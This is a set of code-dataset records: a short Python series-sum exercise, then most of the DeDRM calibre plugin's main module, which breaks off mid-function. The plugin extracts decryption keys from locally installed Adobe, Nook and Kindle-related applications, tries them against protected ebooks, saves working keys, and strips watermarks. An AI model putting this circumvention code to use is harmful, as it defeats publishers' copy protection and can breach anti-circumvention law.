print(result)\n","sub_path":"0066_plus_one.py","file_name":"0066_plus_one.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"625006025","text":"\"\"\"\n4.\tFind the sum of n elements of the following number series: 1 -0.5 0.25 -0.125 ...\nThe number of elements (n) is entered from the keyboard.\n\nExample:\nEnter the number of elements: 3\nNumber of elements - 3, their sum - 0.75\n\nTHE IMPLEMENTATION HERE MUST USE A LOOP\n\"\"\"\nwhile True:\n try:\n n = int(input('Enter the number of elements of the series (1 -0.5 0.25 -0.125 ...), or enter 0 to quit: '))\n if n == 0:\n print('Program finished')\n break\n if n < 0:\n print('Negative number')\n continue\n\n amount, element = 0, 1\n for i in range(n):\n amount += element\n element /= -2\n print(f'Sum of the series elements: {amount}')\n\n except ValueError:\n print('Invalid input')\n","sub_path":"Урок 2. 
Практическое задание/task_4/task_4_1.py","file_name":"task_4_1.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"523926106","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\n# __init__.py for DeDRM_plugin\n# Copyright © 2008-2020 Apprentice Harper et al.\n# Copyright © 2021-2023 NoDRM\n\n__license__ = 'GPL v3'\n__docformat__ = 'restructuredtext en'\n\n\n# Released under the terms of the GNU General Public Licence, version 3\n# <http://www.gnu.org/licenses/>\n#\n# All credit given to i♥cabbages and The Dark Reverser for the original standalone scripts.\n# We had the much easier job of converting them to a calibre plugin.\n#\n# This plugin is meant to decrypt eReader PDBs, Adobe Adept ePubs, Barnes & Noble ePubs,\n# Adobe Adept PDFs, Amazon Kindle and Mobipocket files without having\n# to install any dependencies... other than having calibre installed, of course.\n#\n# Configuration:\n# Check out the plugin's configuration settings by clicking the \"Customize plugin\"\n# button when you have the \"DeDRM\" plugin highlighted (under Preferences->\n# Plugins->File type plugins). Once you have the configuration dialog open, you'll\n# see a Help link on the top right-hand side.\n#\n# Revision history:\n# 6.0.0 - Initial release\n# 6.0.1 - Bug Fixes for Windows App, Kindle for Mac and Windows Adobe Digital Editions\n# 6.0.2 - Restored call to Wine to get Kindle for PC keys, added for ADE\n# 6.0.3 - Fixes for Kindle for Mac and Windows non-ascii user names\n# 6.0.4 - Fixes for stand-alone scripts and applications\n# and pdb files in plugin and initial conversion of prefs.\n# 6.0.5 - Fix a key issue\n# 6.0.6 - Fix up an incorrect function call\n# 6.0.7 - Error handling for incomplete PDF metadata\n# 6.0.8 - Fixes a Wine key issue and topaz support\n# 6.0.9 - Ported to work with newer versions of Calibre (moved to Qt5). Still supports older Qt4 versions.\n# 6.1.0 - Fixed multiple books import problem and PDF import with no key problem\n# 6.2.0 - Support for getting B&N key from nook Study log. Fix for UTF-8 filenames in Adobe ePubs.\n# Fix for not copying needed files. 
Fix for getting default Adobe key for PDFs\n# 6.2.1 - Fix for non-ascii Windows user names\n# 6.2.2 - Added URL method for B&N/nook books\n# 6.3.0 - Added in Kindle for Android serial number solution\n# 6.3.1 - Version number bump for clarity\n# 6.3.2 - Fixed Kindle for Android help file\n# 6.3.3 - Bug fix for Kindle for PC support\n# 6.3.4 - Fixes for Kindle for Android, Linux, and Kobo 3.17\n# 6.3.5 - Fixes for Linux, and Kobo 3.19 and more logging\n# 6.3.6 - Fixes for ADE ePub and PDF introduced in 6.3.5\n# 6.4.0 - Updated for new Kindle for PC encryption\n# 6.4.1 - Fix for some new tags in Topaz ebooks.\n# 6.4.2 - Fix for more new tags in Topaz ebooks and very small Topaz ebooks\n# 6.4.3 - Fix for error that only appears when not in debug mode\n# Also includes fix for Macs with bonded ethernet ports\n# 6.5.0 - Big update to Macintosh app\n# Fix for some more 'new' tags in Topaz ebooks.\n# Fix an error in wineutils.py\n# 6.5.1 - Updated version number, added PDF check for DRM-free documents\n# 6.5.2 - Another Topaz fix\n# 6.5.3 - Warn about KFX files explicitly\n# 6.5.4 - Mac App Fix, improve PDF decryption, handle latest tcl changes in ActivePython\n# 6.5.5 - Finally a fix for the Windows non-ASCII user names.\n# 6.6.0 - Add kfx and kfx-zip as supported file types (also invoke this plugin if the original\n# imported format was azw8 since that may be converted to kfx)\n# 6.6.1 - Thanks to wzyboy for a fix for stand-alone tools, and the new folder structure.\n# 6.6.2 - revamp of folders to get Mac OS X app working. Updated to 64-bit app. Various fixes.\n# 6.6.3 - More cleanup of kindle book names and start of support for .kinf2018\n# 6.7.0 - Handle new library in calibre.\n# 6.8.0 - Full support for .kinf2018 and new KFX encryption (Kindle for PC/Mac 2.5+)\n# 6.8.1 - Kindle key fix for Mac OS X Big Sur\n# 7.0.0 - Switched to Python 3 for calibre 5.0. Thanks to all who contributed\n# 7.0.1 - More Python 3 changes. Adobe PDF decryption should now work in some cases\n# 7.0.2 - More Python 3 changes. Adobe PDF decryption should now work on PC too.\n# 7.0.3 - More Python 3 changes. Integer division in ineptpdf.py\n# 7.1.0 - Full release for calibre 5.x\n# 7.2.0 - Update for latest KFX changes, and Python 3 Obok fixes.\n# 7.2.1 - Whitespace!\n# 10.0.0 - First forked version by NoDRM. See CHANGELOG.md for details.\n# 10.0.1 - Fixes a bug in the watermark code.\n# 10.0.2 - Fix Kindle for Mac & update Adobe key retrieval\n# For changes made in 10.0.3 and above, see the CHANGELOG.md file\n\n\"\"\"\nDecrypt DRMed ebooks.\n\"\"\"\n\nimport codecs\nimport sys, os\nimport time\nimport traceback\n\n#@@CALIBRE_COMPAT_CODE@@\n\ntry: \n try: \n from . import __version\n except:\n import __version\nexcept: \n print(\"#############################\")\n print(\"Failed to load the DeDRM plugin\")\n print(\"Did you bundle this from source code yourself? 
If so, you'll need to run make_release.py instead to generate a valid plugin file.\")\n print(\"If you have no idea what the above means, please redownload the most recent version of the plugin from the Github Releases page.\")\n print(\"If you still receive this error with the released version, please open a bug report and attach the following information:\")\n print(\"#############################\")\n print(\"Debug information:\")\n print(\"__version not found, path is:\")\n print(sys.path)\n print(\"I'm at:\")\n print(__file__)\n print(\"#############################\")\n raise\n\n\nclass DeDRMError(Exception):\n pass\n\ntry: \n from calibre.customize import FileTypePlugin\nexcept: \n # Allow import without Calibre.\n class FileTypePlugin:\n pass\n\ntry:\n from calibre.constants import iswindows, isosx\nexcept:\n iswindows = sys.platform.startswith('win')\n isosx = sys.platform.startswith('darwin')\n\ntry: \n from calibre.utils.config import config_dir\nexcept:\n config_dir = \"\"\n\ntry: \n from . import utilities\nexcept: \n import utilities\n\n\nPLUGIN_NAME = __version.PLUGIN_NAME\nPLUGIN_VERSION = __version.PLUGIN_VERSION\nPLUGIN_VERSION_TUPLE = __version.PLUGIN_VERSION_TUPLE\n\nclass DeDRM(FileTypePlugin):\n name = PLUGIN_NAME\n description = \"Removes DRM from Adobe Adept (including Kobo), Barnes & Noble, Amazon Kindle, Mobipocket and eReader ebooks. Credit given to i♥cabbages and The Dark Reverser for the original stand-alone scripts.\"\n supported_platforms = ['linux', 'osx', 'windows']\n author = \"Apprentice Alf, Apprentice Harper, NoDRM, The Dark Reverser and i♥cabbages\"\n version = PLUGIN_VERSION_TUPLE\n #minimum_calibre_version = (5, 0, 0) # Python 3.\n minimum_calibre_version = (2, 0, 0) # Needs Calibre 1.0 minimum. 1.X untested.\n file_types = set(['epub','pdf','pdb','prc','mobi','pobi','azw','azw1','azw3','azw4','azw8','tpz','kfx','kfx-zip'])\n on_import = True\n on_preprocess = True\n priority = 600\n\n\n def cli_main(self, data):\n from .standalone import main\n main(data)\n \n def initialize(self):\n \"\"\"\n Extracting a couple Python scripts if running on Linux, \n just in case we need to run them in Wine.\n\n The extraction only happens once per version of the plugin\n Also perform upgrade of preferences once per version\n \"\"\"\n\n try:\n self.pluginsdir = os.path.join(config_dir,\"plugins\")\n if not os.path.exists(self.pluginsdir):\n os.mkdir(self.pluginsdir)\n self.maindir = os.path.join(self.pluginsdir,\"DeDRM\")\n if not os.path.exists(self.maindir):\n os.mkdir(self.maindir)\n self.helpdir = os.path.join(self.maindir,\"help\")\n if not os.path.exists(self.helpdir):\n os.mkdir(self.helpdir)\n self.alfdir = os.path.join(self.maindir,\"libraryfiles\")\n if not os.path.exists(self.alfdir):\n os.mkdir(self.alfdir)\n # only continue if we've never run this version of the plugin before\n self.verdir = os.path.join(self.maindir,PLUGIN_VERSION)\n if not os.path.exists(self.verdir) and not iswindows and not isosx:\n\n names = [\"kindlekey.py\",\"adobekey.py\",\"ignoblekeyNookStudy.py\",\"utilities.py\",\"argv_utils.py\"]\n\n lib_dict = self.load_resources(names)\n print(\"{0} v{1}: Copying needed Python scripts from plugin's zip\".format(PLUGIN_NAME, PLUGIN_VERSION))\n\n for entry, data in lib_dict.items():\n file_path = os.path.join(self.alfdir, entry)\n try:\n os.remove(file_path)\n except:\n pass\n\n try:\n open(file_path,'wb').write(data)\n except:\n print(\"{0} v{1}: Exception when copying needed python scripts\".format(PLUGIN_NAME, PLUGIN_VERSION))\n 
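# log the traceback but keep going; these scripts only matter for the Wine fallback on Linux\n 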
traceback.print_exc()\n pass\n\n # mark that this version has been initialized\n os.mkdir(self.verdir)\n except Exception as e:\n traceback.print_exc()\n raise\n\n def postProcessEPUB(self, path_to_ebook):\n # This is called after the DRM is removed (or if no DRM was present)\n # It does stuff like de-obfuscating fonts (by calling checkFonts) \n # or removing watermarks. \n\n postProcessStart = time.time()\n\n try: \n import prefs\n dedrmprefs = prefs.DeDRM_Prefs()\n\n if dedrmprefs[\"deobfuscate_fonts\"] is True:\n # Deobfuscate fonts\n path_to_ebook = self.checkFonts(path_to_ebook) or path_to_ebook\n\n if dedrmprefs[\"remove_watermarks\"] is True:\n import epubwatermark as watermark\n\n # Remove Tolino's CDP watermark file\n path_to_ebook = watermark.removeCDPwatermark(self, path_to_ebook) or path_to_ebook\n\n # Remove watermarks (Amazon or LemonInk) from the OPF file\n path_to_ebook = watermark.removeOPFwatermarks(self, path_to_ebook) or path_to_ebook\n\n # Remove watermarks (Adobe, Pocketbook or LemonInk) from all HTML and XHTML files\n path_to_ebook = watermark.removeHTMLwatermarks(self, path_to_ebook) or path_to_ebook\n\n \n \n postProcessEnd = time.time()\n print(\"{0} v{1}: Post-processing took {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, postProcessEnd-postProcessStart))\n\n return path_to_ebook\n\n except: \n print(\"Error while checking settings\")\n return path_to_ebook\n\n def checkFonts(self, path_to_ebook):\n # This is called after the normal DRM removal is done. \n # It checks if there's fonts that need to be deobfuscated\n\n try: \n import epubfontdecrypt\n\n output = self.temporary_file(\".epub\").name\n ret = epubfontdecrypt.decryptFontsBook(path_to_ebook, output)\n\n if (ret == 0):\n return output\n elif (ret == 1):\n return path_to_ebook\n else:\n print(\"{0} v{1}: Error during font deobfuscation\".format(PLUGIN_NAME, PLUGIN_VERSION))\n raise DeDRMError(\"Font deobfuscation failed\")\n \n except: \n print(\"{0} v{1}: Error during font deobfuscation\".format(PLUGIN_NAME, PLUGIN_VERSION))\n traceback.print_exc()\n return path_to_ebook\n\n def ePubDecrypt(self,path_to_ebook):\n # Create a TemporaryPersistent file to work with.\n # Check original epub archive for zip errors.\n import zipfix\n\n inf = self.temporary_file(\".epub\")\n try:\n print(\"{0} v{1}: Verifying zip archive integrity\".format(PLUGIN_NAME, PLUGIN_VERSION))\n fr = zipfix.fixZip(path_to_ebook, inf.name)\n fr.fix()\n except Exception as e:\n print(\"{0} v{1}: Error \\'{2}\\' when checking zip archive\".format(PLUGIN_NAME, PLUGIN_VERSION, e.args[0]))\n raise\n\n # import the decryption keys\n import prefs\n dedrmprefs = prefs.DeDRM_Prefs()\n\n\n # import the LCP handler\n import lcpdedrm\n\n if (lcpdedrm.isLCPbook(path_to_ebook)):\n try: \n retval = lcpdedrm.decryptLCPbook(path_to_ebook, dedrmprefs['lcp_passphrases'], self)\n except:\n print(\"Looks like that didn't work:\")\n raise\n\n return self.postProcessEPUB(retval)\n \n\n # Not an LCP book, do the normal EPUB (Adobe) handling.\n\n # import the Adobe ePub handler\n import ineptepub\n\n if ineptepub.adeptBook(inf.name):\n\n if ineptepub.isPassHashBook(inf.name): \n # This is an Adobe PassHash / B&N encrypted eBook\n print(\"{0} v{1}: “{2}” is a secure PassHash-protected (B&N) ePub\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook)))\n\n # Attempt to decrypt epub with each encryption key (generated or provided).\n for keyname, userkey in dedrmprefs['bandnkeys'].items():\n print(\"{0} v{1}: Trying Encryption key 
{2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".epub\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n except:\n print(\"{0} v{1}: Exception when trying to decrypt after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n return self.postProcessEPUB(of.name)\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n # perhaps we should see if we can get a key from a log file\n print(\"{0} v{1}: Looking for new NOOK Keys after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n # get the default NOOK keys\n defaultkeys = []\n\n ###### Add keys from the NOOK Study application (ignoblekeyNookStudy.py)\n\n try:\n defaultkeys_study = []\n if iswindows or isosx:\n from ignoblekeyNookStudy import nookkeys\n\n defaultkeys_study = nookkeys()\n else: # linux\n from wineutils import WineGetKeys\n\n scriptpath = os.path.join(self.alfdir,\"ignoblekeyNookStudy.py\")\n defaultkeys_study, defaultnames_study = WineGetKeys(scriptpath, \".b64\",dedrmprefs['adobewineprefix'])\n\n except:\n print(\"{0} v{1}: Exception when getting default NOOK Study Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n \n\n ###### Add keys from the NOOK Microsoft Store application (ignoblekeyNookStudy.py)\n\n try:\n defaultkeys_store = []\n if iswindows:\n # That's a Windows store app, it won't run on Linux or MacOS anyways.\n # No need to waste time running Wine.\n from ignoblekeyWindowsStore import dump_keys as dump_nook_keys\n defaultkeys_store = dump_nook_keys(False)\n\n except:\n print(\"{0} v{1}: Exception when getting default NOOK Microsoft App keys after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n ###### Add keys from Adobe PassHash ADE activation data (adobekey_get_passhash.py)\n\n try: \n defaultkeys_ade = []\n if iswindows:\n # Right now this is only implemented for Windows. 
MacOS support still needs to be added.\n                        from adobekey_get_passhash import passhash_keys, ADEPTError\n                        try: \n                            defaultkeys_ade, names = passhash_keys()\n                        except ADEPTError:\n                            defaultkeys_ade = []\n                        if isosx:\n                            print("{0} v{1}: Dumping ADE PassHash data is not yet supported on MacOS.".format(PLUGIN_NAME, PLUGIN_VERSION))\n                            defaultkeys_ade = []\n                    except:\n                        print("{0} v{1}: Exception when getting PassHashes from ADE after {2:.1f} seconds".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n                        traceback.print_exc()\n\n\n                    ###### Check if one of the new keys decrypts the book:\n\n                    newkeys = []\n                    for keyvalue in defaultkeys_study:\n                        if keyvalue not in dedrmprefs['bandnkeys'].values() and keyvalue not in newkeys:\n                            newkeys.append(keyvalue)\n\n                    if iswindows:\n                        for keyvalue in defaultkeys_store:\n                            if keyvalue not in dedrmprefs['bandnkeys'].values() and keyvalue not in newkeys:\n                                newkeys.append(keyvalue)\n\n                        for keyvalue in defaultkeys_ade:\n                            if keyvalue not in dedrmprefs['bandnkeys'].values() and keyvalue not in newkeys:\n                                newkeys.append(keyvalue)\n\n                    if len(newkeys) > 0:\n                        try:\n                            for i,userkey in enumerate(newkeys):\n\n                                if len(userkey) == 0:\n                                    print("{0} v{1}: Skipping empty key.".format(PLUGIN_NAME, PLUGIN_VERSION)) \n                                    continue\n\n                                print("{0} v{1}: Trying a new default key".format(PLUGIN_NAME, PLUGIN_VERSION))\n\n                                of = self.temporary_file(".epub")\n\n                                # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n                                try:\n                                    result = ineptepub.decryptBook(userkey, inf.name, of.name)\n                                except:\n                                    print("{0} v{1}: Exception when trying to decrypt after {2:.1f} seconds".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n                                    traceback.print_exc()\n                                    result = 1\n\n                                of.close()\n\n                                if result == 0:\n                                    # Decryption was a success\n                                    # Store the new successful key in the defaults (save `userkey`, the key that\n                                    # actually decrypted the book, not the stale `keyvalue` loop variable)\n                                    print("{0} v{1}: Saving a new default key".format(PLUGIN_NAME, PLUGIN_VERSION))\n                                    try:\n                                        if userkey in defaultkeys_ade:\n                                            dedrmprefs.addnamedvaluetoprefs('bandnkeys','ade_passhash_'+str(int(time.time())),userkey)\n                                        else:\n                                            dedrmprefs.addnamedvaluetoprefs('bandnkeys','nook_key_'+str(int(time.time())),userkey)\n                                        dedrmprefs.writeprefs()\n                                        print("{0} v{1}: Saved a new default key after {2:.1f} seconds".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n                                    except:\n                                        print("{0} v{1}: Exception saving a new default key after {2:.1f} seconds".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n                                        traceback.print_exc()\n                                    # Return the modified PersistentTemporary file to calibre.\n                                    return self.postProcessEPUB(of.name)\n\n                                print("{0} v{1}: Failed to decrypt with new default key after {2:.1f} seconds".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n                            return inf.name\n                        \n                        except:\n                            pass\n\n                # Looks like we were unable to decrypt the book ...\n                return inf.name\n\n            else: \n                # This is a "normal" Adobe eBook.\n\n                book_uuid = None\n                try: \n                    # This tries to figure out which Adobe account UUID the book is licensed for. 
\n # If we know that we can directly use the correct key instead of having to\n # try them all.\n book_uuid = ineptepub.adeptGetUserUUID(inf.name)\n except: \n pass\n\n if book_uuid is None: \n print(\"{0} v{1}: {2} is a secure Adobe Adept ePub\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook)))\n else: \n print(\"{0} v{1}: {2} is a secure Adobe Adept ePub for UUID {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook), book_uuid))\n\n\n if book_uuid is not None: \n # Check if we have a key with that UUID in its name: \n for keyname, userkeyhex in dedrmprefs['adeptkeys'].items():\n if not book_uuid.lower() in keyname.lower(): \n continue\n\n # Found matching key\n print(\"{0} v{1}: Trying UUID-matched encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".epub\")\n try: \n userkey = codecs.decode(userkeyhex, 'hex')\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n of.close()\n if result == 0:\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return self.postProcessEPUB(of.name)\n except ineptepub.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return self.postProcessEPUB(path_to_ebook)\n\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds - trying other keys\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n\n # Attempt to decrypt epub with each encryption key (generated or provided).\n for keyname, userkeyhex in dedrmprefs['adeptkeys'].items():\n \n print(\"{0} v{1}: Trying Encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".epub\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n userkey = codecs.decode(userkeyhex, 'hex')\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n except ineptepub.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return self.postProcessEPUB(path_to_ebook)\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n try:\n of.close()\n except:\n print(\"{0} v{1}: Exception closing temporary file after {2:.1f} seconds. 
Ignored.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return self.postProcessEPUB(of.name)\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n # perhaps we need to get a new default ADE key\n print(\"{0} v{1}: Looking for new default Adobe Digital Editions Keys after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n # get the default Adobe keys\n defaultkeys = []\n\n try:\n if iswindows or isosx:\n from adobekey import adeptkeys\n\n defaultkeys, defaultnames = adeptkeys()\n else: # linux\n from wineutils import WineGetKeys\n\n scriptpath = os.path.join(self.alfdir,\"adobekey.py\")\n defaultkeys, defaultnames = WineGetKeys(scriptpath, \".der\",dedrmprefs['adobewineprefix'])\n\n except:\n print(\"{0} v{1}: Exception when getting default Adobe Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n newkeys = []\n newnames = []\n idx = 0\n for keyvalue in defaultkeys:\n if codecs.encode(keyvalue, 'hex').decode('ascii') not in dedrmprefs['adeptkeys'].values():\n newkeys.append(keyvalue)\n newnames.append(\"default_ade_key_uuid_\" + defaultnames[idx])\n idx += 1\n\n # Check for DeACSM keys:\n try: \n from config import checkForDeACSMkeys\n\n newkey, newname = checkForDeACSMkeys()\n\n if newkey is not None: \n if codecs.encode(newkey, 'hex').decode('ascii') not in dedrmprefs['adeptkeys'].values():\n print(\"{0} v{1}: Found new key '{2}' in DeACSM plugin\".format(PLUGIN_NAME, PLUGIN_VERSION, newname))\n newkeys.append(newkey)\n newnames.append(newname)\n except:\n traceback.print_exc()\n pass\n\n if len(newkeys) > 0:\n try:\n for i,userkey in enumerate(newkeys):\n print(\"{0} v{1}: Trying a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n of = self.temporary_file(\".epub\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was a success\n # Store the new successful key in the defaults\n print(\"{0} v{1}: Saving a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n try:\n dedrmprefs.addnamedvaluetoprefs('adeptkeys', newnames[i], codecs.encode(userkey, 'hex').decode('ascii'))\n dedrmprefs.writeprefs()\n print(\"{0} v{1}: Saved a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n except:\n print(\"{0} v{1}: Exception when saving a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n print(\"{0} v{1}: Decrypted with new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n # Return the modified PersistentTemporary file to calibre.\n return self.postProcessEPUB(of.name)\n\n print(\"{0} v{1}: Failed to decrypt with new default key after {2:.1f} seconds\".format(PLUGIN_NAME, 
PLUGIN_VERSION,time.time()-self.starttime))\n except Exception as e:\n print(\"{0} v{1}: Unexpected Exception trying a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n pass\n\n # Something went wrong with decryption.\n print(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n raise DeDRMError(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n\n\n\n # Not a Barnes & Noble nor an Adobe Adept\n # Probably a DRM-free EPUB, but we should still check for fonts.\n return self.postProcessEPUB(inf.name)\n\n \n def PDFIneptDecrypt(self, path_to_ebook):\n # Sub function to prevent PDFDecrypt from becoming too large ...\n import prefs\n import ineptpdf\n dedrmprefs = prefs.DeDRM_Prefs()\n\n book_uuid = None\n try: \n # Try to figure out which Adobe account this book is licensed for.\n book_uuid = ineptpdf.adeptGetUserUUID(path_to_ebook)\n except:\n pass\n\n if book_uuid is not None: \n print(\"{0} v{1}: {2} is a PDF ebook (EBX) for UUID {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook), book_uuid))\n # Check if we have a key for that UUID\n for keyname, userkeyhex in dedrmprefs['adeptkeys'].items():\n if not book_uuid.lower() in keyname.lower():\n continue\n \n # Found matching key\n print(\"{0} v{1}: Trying UUID-matched encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".pdf\")\n\n try: \n userkey = codecs.decode(userkeyhex, 'hex')\n result = ineptpdf.decryptBook(userkey, path_to_ebook, of.name)\n of.close()\n if result == 0:\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return of.name\n \n except ineptpdf.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return path_to_ebook\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds - trying other keys\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n\n # If we end up here, we didn't find a key with a matching UUID, so lets just try all of them.\n\n # Attempt to decrypt PDF with each encryption key (generated or provided). 
\n for keyname, userkeyhex in dedrmprefs['adeptkeys'].items():\n userkey = codecs.decode(userkeyhex,'hex')\n print(\"{0} v{1}: Trying encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".pdf\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptpdf.decryptBook(userkey, path_to_ebook, of.name)\n except ineptpdf.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return path_to_ebook\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return of.name\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n # perhaps we need to get a new default ADE key\n print(\"{0} v{1}: Looking for new default Adobe Digital Editions Keys after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n # get the default Adobe keys\n defaultkeys = []\n\n try:\n if iswindows or isosx:\n from adobekey import adeptkeys\n\n defaultkeys, defaultnames = adeptkeys()\n else: # linux\n from wineutils import WineGetKeys\n\n scriptpath = os.path.join(self.alfdir,\"adobekey.py\")\n defaultkeys, defaultnames = WineGetKeys(scriptpath, \".der\",dedrmprefs['adobewineprefix'])\n\n except:\n print(\"{0} v{1}: Exception when getting default Adobe Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n newkeys = []\n newnames = []\n idx = 0\n for keyvalue in defaultkeys:\n if codecs.encode(keyvalue,'hex') not in dedrmprefs['adeptkeys'].values():\n newkeys.append(keyvalue)\n newnames.append(\"default_ade_key_uuid_\" + defaultnames[idx])\n idx += 1\n\n # Check for DeACSM keys:\n try: \n from config import checkForDeACSMkeys\n\n newkey, newname = checkForDeACSMkeys()\n\n if newkey is not None: \n if codecs.encode(newkey, 'hex').decode('ascii') not in dedrmprefs['adeptkeys'].values():\n print(\"{0} v{1}: Found new key '{2}' in DeACSM plugin\".format(PLUGIN_NAME, PLUGIN_VERSION, newname))\n newkeys.append(newkey)\n newnames.append(newname)\n except:\n traceback.print_exc()\n\n if len(newkeys) > 0:\n try:\n for i,userkey in enumerate(newkeys):\n print(\"{0} v{1}: Trying a new default key\".format(PLUGIN_NAME, 